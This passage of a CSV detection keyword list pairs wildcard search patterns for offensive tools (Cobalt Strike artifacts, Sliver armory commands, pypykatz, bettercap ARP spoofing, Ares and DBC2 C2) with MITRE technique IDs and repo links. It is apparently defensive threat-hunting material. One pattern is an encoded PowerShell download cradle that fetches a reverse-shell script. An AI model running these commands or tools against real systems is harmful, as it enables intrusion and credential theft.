don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. 
Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2271","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" +"*apypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5266","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" +"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. 
The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-10-04T02:00:32Z","2017-12-04T12:42:54Z" +"*archive-*.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ArchStrike*","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Args_Invoke_Kerberoast*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*armitage.exe*","offensive_tool_keyword","armitage","Armitage is a 
graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Arno0x/DBC2*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed 
of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Arno0x/EmbedInHTML*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*Arno0x/WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp_mitm.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" 
+"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoofing.py *","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" +"*arsenal_kit.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact.cna*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security 
assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x86.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact.x86.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_payload*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_payload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_stageless*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_stageless*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*artifact_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security 
